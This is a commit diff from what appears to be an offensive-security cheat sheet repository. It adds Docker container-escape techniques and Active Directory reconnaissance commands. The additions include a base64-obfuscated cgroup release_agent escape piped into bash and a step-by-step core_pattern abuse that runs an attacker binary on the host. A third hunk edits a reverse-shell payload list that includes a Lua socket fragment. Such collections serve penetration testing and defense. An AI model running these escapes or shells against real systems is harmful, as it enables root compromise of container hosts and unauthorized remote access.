Docker Escape cgroup

This commit is contained in:
Swissky 2022-08-05 12:26:31 +02:00
commit 7fe0a0475e
3 changed files with 40 additions and 4 deletions

View File

@ -460,10 +460,15 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
### Other Interesting Commands
- **Find Domain Controller**
- **Find Domain Controllers**
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>.com
nltest /
Get-ADDomainController -filter * | Select-Object name
gpresult /r
## Most common paths to AD compromise
@ -3867,4 +3872,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](
* [Shadow Credentials - The Hacker Recipes](
* [Shadow Credentials - The Hacker Recipes](

View File

@ -9,6 +9,8 @@
- [Open Docker API Port](#open-docker-api-port)
- [Insecure Docker Registry](#insecure-docker-registry)
- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
- [Abusing CAP_SYS_ADMIN capability](#abusing-capsysadmin-capability)
- [Abusing coredumps and core_pattern](#abusing-coredumps-and-corepattern)
- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
- [References](#references)
@ -137,6 +139,9 @@ Prerequisite (at least one):
* `--privileged`
* `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags.
### Abusing CAP_SYS_ADMIN capability
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -'
@ -161,6 +166,31 @@ chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
### Abusing coredumps and core_pattern
1. Find the mounting point using `mount`
$ mount | head -n 1
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/YLH6C6EQMMG7DA2AL5DUANDHYJ:/var/lib/docker/overlay2/l/HP7XLDFT4ERSCYVHJ2WMZBG2YT,upperdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff,workdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/work)
2. Create an evil binary at the root of the filesystem: `cp /tmp/poc /poc`
3. Set the program to be executed on the coredumps
echo "|/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff/poc" > /proc/sys/kernel/core_pattern
4. Generate a coredump with a faulty program: `gcc -o crash crash.c && ./crash`
int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) {
buf[i] = 1;
return 0;
5. Your payload should have been executed on the host
## Breaking out of Docker via runC
> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team
@ -216,4 +246,5 @@ The only caveat is that we cannot be sure that the container has `kmod` installe
- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host -](
- [OWASP - Docker Security CheatSheet](
- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](
- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](
- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](
* [Escaping privileged containers for fun - 2022-03-06 :: Jordy Zomer](

View File

@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "", 4242 local socket = require("socket")
return /a/; // Prevents the Node.js application form crashing
return /a/; // Prevents the Node.js application from crashing